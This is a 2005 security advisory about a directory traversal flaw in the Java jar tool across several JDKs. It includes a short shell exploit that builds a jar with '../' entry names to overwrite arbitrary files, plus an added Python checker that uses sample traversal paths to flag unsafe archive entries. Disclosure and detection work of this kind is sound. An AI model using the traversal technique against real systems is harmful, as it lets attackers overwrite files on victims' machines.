[NEWS] Jar Tool Directory Transversal Vulnerability
From: SecuriTeam (support_at_securiteam.com)
Date: 04/11/05
To: list@securiteam.com
Date: 11 Apr 2005 18:59:21 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
Jar Tool Directory Transversal Vulnerability
------------------------------------------------------------------------
SUMMARY
Jar is "a Java archiving and compression application, which is part of
many Java development kits. It was designed mainly to facilitate the
packaging of Java applets or applications into a single archive".
The Jar tool does not properly check whether the names of the files to be
extracted contain the string "../", so an attacker can create a malicious
jar file that overwrites arbitrary files within the file system when it is
extracted.
DETAILS
Affected Software:
The following Java development kits have been tested and contain the
vulnerability; other kits and/or platforms may be affected as well:
* SUN:
  - Sun's J2SE Development Kit 1.5.0 (Solaris, Windows and Linux version)
  - Sun's J2SE Development Kit 1.4.2 (Solaris, Windows and Linux version)
* IBM:
  - IBM Java Development Kit 1.4.2 Linux
* BEA:
  - BEA WebLogic's J2SE Development Kit, version 1.5.0 (Linux and Windows version)
* BLACKDOWN:
  - Blackdown Java Development Kit 1.4.2 Linux
Exploit:
A malicious jar file can be created as follows:
java4fun# echo hi > /tmp/test
java4fun# jar cvf trash.jar *.class ../../../../../../../tmp/test
java4fun# rm /tmp/test
java4fun# jar xvf trash.jar (no overwrite message displayed)
java4fun# cat /tmp/test
hi
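A check that can be run on an untrusted archive before it is handed to an affected jar tool, given here as an added example that is not part of the original advisory. The function names and the sample archive are constructed for illustration; it flags entry names that resolve outside the extraction directory, including cases such as "a/../../x" that go beyond the single "../" prefix shown above.

```python
import io
import posixpath
import re
import zipfile


def unsafe_entries(jar_bytes):
    """Return entry names that would be written outside the extraction directory."""
    flagged = []
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as jar:
        for name in jar.namelist():
            # Jar entries use "/", but an extractor on Windows also honours "\".
            unified = name.replace("\\", "/")
            # Collapse "a/../b" style segments before deciding.
            normalized = posixpath.normpath(unified)
            absolute = unified.startswith("/") or re.match(r"^[A-Za-z]:", unified)
            escapes = normalized == ".." or normalized.startswith("../")
            if absolute or escapes:
                flagged.append(name)
    return flagged


def build_sample_jar(names):
    """Build an in-memory archive with the given entry names (constructed test data)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as jar:
        for name in names:
            jar.writestr(name, b"hi\n")
    return buf.getvalue()


if __name__ == "__main__":
    # Constructed sample mirroring the entry name used in the advisory.
    sample = build_sample_jar([
        "Foo.class",
        "META-INF/MANIFEST.MF",
        "../../../../../../../tmp/test",
        "a/../b.txt",
        "a/../../c.txt",
    ])
    for entry in unsafe_entries(sample):
        print("refusing to extract:", entry)
```

Listing the archive first (for example with `jar tvf`) and extracting only into an empty scratch directory as an unprivileged user limits the damage when such an entry is missed.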
ADDITIONAL INFORMATION
The information has been provided by Pluf <pluf@7a69ezine.org>.